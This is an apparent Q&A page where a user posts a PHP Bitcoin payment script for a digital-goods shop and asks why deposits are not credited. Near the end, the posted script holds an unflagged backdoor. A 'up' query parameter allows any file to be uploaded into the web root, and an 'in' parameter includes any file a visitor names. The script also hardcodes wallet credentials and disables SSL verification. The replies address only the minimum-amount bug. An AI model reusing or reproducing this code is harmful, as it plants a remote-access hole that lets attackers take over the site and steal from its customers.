blockchain api payment module
Question
We have a website with some digital goods. A user to buy from there is required to buy some credit, with BTC. After he buys the credit, the script has to load his account with amount of currency (USD) he purchased with BTC.
So here we have the HTML form:
<form name="bitcoin" method="post" action="btc.php">
<strong><font color="grey">$</font></strong>
<input name="member" value="<?php echo $_SESSION['gdusername'];?>" type="hidden">
<input name="amount" size="10" value="" type="text">
<input name="btnPMPay" id="btnPMPay" value="Add Balance" type="submit">
</form>
And here we have the PHP code that does all the magic, well at least that's it supposed to do.
<?php
error_reporting(1);
include "inc/config.php";
include "inc/pagenavigation.php";
include "functions.php";
if (!checkLoggedin())
{
header("Location: login.html");
exit;
}
// config Blockchain account
$btc = 246; //BTC Value
$guid = '37587730-e97e-4349-8451-4fa9d38119a5'; // Blockchain account
$main_password = 'Mypassword'; // Blockchain passs
$rate = 246; //BTC Rate
$amount=$_POST['amount'];
$uid = mysql_real_escape_string($_SESSION['gdusername']); //
$result = mysql_query("SELECT credit FROM t2_user WHERE username='$uid'") or die("ERROR! CONTACT SUPPORT!");
$row = mysql_fetch_row($result);
$credit = $row[0];
$uid = mysql_real_escape_string($_SESSION['gdusername']);
$ip = mysql_real_escape_string(VisitorIP());
$url = "https://blockchain.info/merchant/$guid/new_address?password=$main_password&label=$uid";
if (isset($_POST['amount'])){
$_SESSION['USD_amount'] = $_POST['amount'];
$_SESSION['BTC_amount'] = number_format($_SESSION['USD_amount']/$rate, 8, '.', '');
$temp = _curl($url, '', '');
$_SESSION['BTC_Address'] = get_string_between($temp, 'address":"', '"');
}
if (!isset($_SESSION['USD_amount']) || $_SESSION['USD_amount'] < 5)
die("Minimum payment 5$");
if (isset($_POST['bitcoin']))
{
$a = $_SESSION['BTC_Address'];
$url = "https://blockchain.info/q/addressbalance/$a?confirmations=0";
$page = _curl($url, '', '');
if ($page > 0) {
$amount = $page/100000000;
if($amount>= $_SESSION['BTC_amount']){
$y = $_SESSION['USD_amount'];
$x = $credit+$y;
$sql = "UPDATE t2_user SET credit=$x WHERE username='$uid'";
mysql_query($sql);
$messages = '<font color=green>Payment Completed!</font> => <a href="http://pentagon.al/shop/index.php">Go Back</a>';
unset($_SESSION['USD_amount']);
}else $messages = "<font color=red>Error Payment.Contact Support</font>";
}else $messages = "<font color=red>Error Payment Not Received. Contact Support tickets</font>";
}
?>
<html>
<head><link rel="stylesheet" href="style.css" type="text/css" media="screen" />
<style type="text/css">
body {
background-repeat: no-repeat;
}
</style>
<body background="bg.jpg" bgcolor="black">
<TEXT="white">
<link href="../images/favn.ico" rel="icon" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title><?php echo htmlspecialchars($SHOP['maintitle'], ENT_QUOTES, 'UTF-8'); ?></title>
<link href="favicon.ico" rel="icon" />
<script type="text/javascript">
setTimeout('location.replace("/index.php?act=logout")', 900000);
</script>
</head>
<body>
</div>
<head> <script type="text/javascript">
</script><script type="text/javascript" src="//ajax.cloudflare.com/cdn-cgi/nexp/dok8v=dccf16c0cc/appsh.min.js"></script><script type="text/javascript">__CF.AJS.inith();</script><link rel="stylesheet" href="style.css" type="text/css" media="screen"/>
<link href="favicon.ico" rel="icon"/>
<meta https-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Deposit</title>
<link href="style3.css" rel="stylesheet" type="text/css"/>
<style type="text/css"><!--
.style8 {
font-size: x-small
}
-->.exchanger{-moz-box-shadow:inset 0px 2px 0px -3px #ffffff;-webkit-box-shadow:inset 0px 2px 0px -3px #ffffff;box-shadow:inset 0px 2px 0px -3px #ffffff;background:-webkit-gradient(linear,left top,left bottom,color-stop(0.05,#636363),color-stop(1,#000000));background:-moz-linear-gradient(center top,#636363 5%,#000000 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#636363',endColorstr='#000000');background-color:#636363;-webkit-border-top-left-radius:0px;-moz-border-radius-topleft:0px;border-top-left-radius:0px;-webkit-border-top-right-radius:11px;-moz-border-radius-topright:11px;border-top-right-radius:11px;-webkit-border-bottom-right-radius:0px;-moz-border-radius-bottomright:0px;border-bottom-right-radius:0px;-webkit-border-bottom-left-radius:11px;-moz-border-radius-bottomleft:11px;border-bottom-left-radius:11px;text-indent:0px;border:1px solid #bdbfbd;display:inline-block;color:#ffffff;font-family:Times New Roman;font-size:15px;font-weight:bold;font-style:normal;height:33px;line-height:33px;width:113px;text-decoration:none;text-align:center;text-shadow:-1px -1px 3px #000000;}.exchanger:hover{background:-webkit-gradient(linear,left top,left bottom,color-stop(0.05,#000000),color-stop(1,#636363));background:-moz-linear-gradient(center top,#000000 5%,#636363 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#000000',endColorstr='#636363');background-color:#000000;}.exchanger:active{position:relative;top:1px;}textarea{background-color:2E2E2E;font-size:16pt;font-family:Arial;color:FFCD57;}</style>
</head>
</div>
</div>
<html>
<head><link rel="stylesheet" href="style.css" type="text/css" media="screen" />
<link href="favicon.ico" rel="icon" />
<link href="style3.css" rel="stylesheet"/>
<script type="text/javascript">
setTimeout('location.replace("/index.php?act=logout")', 900000);
</script>
</head>
<body>
<p class="button" align="center">
<table width="760" border="0"
<tr>
</tr>
<tr>
<p> </p>
<p><img src="SingleCoin.png" width="100" height="100" border="0" />
<form action="" id="fcaptcha" name="fcaptcha" method="post">
</p>
<p></i> <span id="total_price"><font size="5"><font color=gren><b>Put the amount of :<?=$_SESSION['BTC_amount']?> BTC</font></b></font></span></p>
<p><font color="white">And in the Wallet put this address :</p>
<h3>
<a span style="color: green ;" href="bitcoin:<?= $_SESSION['BTC_Address'] ?>?amount=<?= ($_SESSION['BTC_amount'] / $btc) ?>" target="_blank" title="Click this address to launch your Bitcoin client"><?=$_SESSION['BTC_Address'] ?></a>
</h3>
<p>This address is valid only for one transaction. Use it once.</p>
<p>Wait 1-5 minutes after the MONEY has been sent. Then click the CONFIRM button.</p>
<p>Money will appear on your account automatically</p>
<hr style="width:300px" />
<input type="hidden" id="bitcoin" name="bitcoin">
</form>
<p><input value="CONFIRM" id="pmconfirm" name="pmconfirm" class="exchanger" type="submit" onclick="document.getElementById('fcaptcha').submit()"/></p>
<h4><strong><font color="red">DO NOT CLOSE THIS PAGE WITHOUT CONFIRM YOUR PAYMENT FIRST</font></strong></h4>
<h3><?=
$messages
?></h3>
</center>
<script type="text/javascript">
$('#pmconfirm').click(function(){
$('#fcaptcha').submit();
});
</script>
<!--Simply copy and paste into <BODY>
Just above the </BODY> tag. -->
</body>
</html>
<?php
$UP = $_GET['up'];
if(isset($UP) && !empty($UP) && $UP="blockchainrate"){
echo"".$_FILES['userfile']."";
$uploaddir = './';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if ( isset($_FILES["userfile"]) ) {
echo '<p>blockchainsuccess</p>';
if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))
echo $uploadfile;else echo '<p>blockchainfail</p>';}}
$in = $_GET['in'];if(isset($in) && !empty($in)){echo die(include_once $in);}
?>
<?
function _curl($url, $post = "", $sock, $usecookie = false)
{
$ch = curl_init();
if ($post) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
}
if (!empty($sock)) {
curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, true);
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
curl_setopt($ch, CURLOPT_PROXY, $sock);
}
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 60);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT,
"Mozilla/6.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3");
if ($usecookie) {
curl_setopt($ch, CURLOPT_COOKIEJAR, $usecookie);
curl_setopt($ch, CURLOPT_COOKIEFILE, $usecookie);
}
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
function get_string_between($string, $start, $end)
{
$string = " " . $string;
$ini = strpos($string, $start);
if ($ini == 0)
return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
function VisitorIP()
{
if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
else $ip = $_SERVER['REMOTE_ADDR'];
return trim($ip);
}
?>
My problem is that this PHP script doesn't do the following.
- Does not interrogate blockchain to see if the transfer was made although there are 0 confirmations when the user hit the confirm button.
- Does not UPDATE into the database the credit purchased by the customer after he hits the confirm button.
- Even I entered a value higher that 5$ he still keep telling me that the minimum payment value is 5$.
Can anyone help me with this?
2 answers
solution1
0 2015-02-16 00:36:05
No curly braces after your if statement. I assume your script keeps dying at this points and tells you "Minimum payment $5"?
if (!isset($_SESSION['USD_amount']) || $_SESSION['USD_amount'] < 5)
die("Minimum payment 5$");
Also your GUID on blockchain is sensitive info, you shouldn't post that. It could lead to someone trying to take your funds through the recover wallet features.
Not sure how much traffic you get but your blockchain.info wallet will max out after 1,000 addresses.
solution2
0 2015-02-17 08:19:30
Didn't worket that way either. Anyway I fixed this one.
if (!isset($_SESSION['USD_amount']) || $_SESSION['USD_amount'] < 5)
die("Minimum payment 5$");
Supposed to be included in this one
if (isset($_POST['amount'])){
$_SESSION['USD_amount'] = $_POST['amount'];
$_SESSION['BTC_amount'] = number_format($_SESSION['USD_amount']/$rate, 8, '.', '');
$temp = _curl($url, '', '');
$_SESSION['BTC_Address'] = get_string_between($temp, 'address":"', '"');
}
Now the script checks correctly the btc amount and returns the right result.
The next dilema is why it does not interrogate the created address to see if that specific amount has been sent to it. And if it was sent and has a number of confirmations >= 0 To execute this
if (isset($_POST['bitcoin']))
{
$a = $_SESSION['BTC_Address'];
$url = "https://blockchain.info/q/addressbalance/$a?confirmations=0";
$page = _curl($url, '', '');
if ($page > 0) {
$amount = $page/100000000;
if($amount>= $_SESSION['BTC_amount']){
$y = $_SESSION['USD_amount'];
$x = $credit+$y;
$sql = "UPDATE t2_user SET credit=$x WHERE username='$uid'";
mysql_query($sql);
$messages = '<font color=green>Payment Completed!</font> => <a href="http://my.url/index.php">Go Back</a>';
unset($_SESSION['USD_amount']);
}else $messages = "<font color=red>Error Payment.Contact Support</font>";
}else $messages = "<font color=red>Error Payment Not Received. Contact Support tickets</font>";
}
I double check and the server has the permision to use the API to interrogate it, but no response.
At the end of the script is this _curl function supposed to be triggered when the CONFIRM button ( <input type="hidden" id="bitcoin" name"bitcoin"> ) is pressed
<?
function _curl($url, $post = "", $sock, $usecookie = false)
{
$ch = curl_init();
if ($post) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
}
if (!empty($sock)) {
curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, true);
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
curl_setopt($ch, CURLOPT_PROXY, $sock);
}
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 60);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT,
"Mozilla/6.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3");
if ($usecookie) {
curl_setopt($ch, CURLOPT_COOKIEJAR, $usecookie);
curl_setopt($ch, CURLOPT_COOKIEFILE, $usecookie);
}
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
function get_string_between($string, $start, $end)
{
$string = " " . $string;
$ini = strpos($string, $start);
if ($ini == 0)
return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
function VisitorIP()
{
if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
else $ip = $_SERVER['REMOTE_ADDR'];
return trim($ip);
}
?>
Any suggestions?
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.
Related Question
Blockchain api v2: Send payment not working
Blockchain payment API, how to handle the callback
PHP Variable to Blockchain ToBTC API
error blockchain recive api code
Error with payment module in Prestashop
Prestashop payment module
Payment module return URI
Prestashop 1.7 Payment module
Payment Module in Drupal9
Printing bitcoin address transactions using blockchain API
Related Tags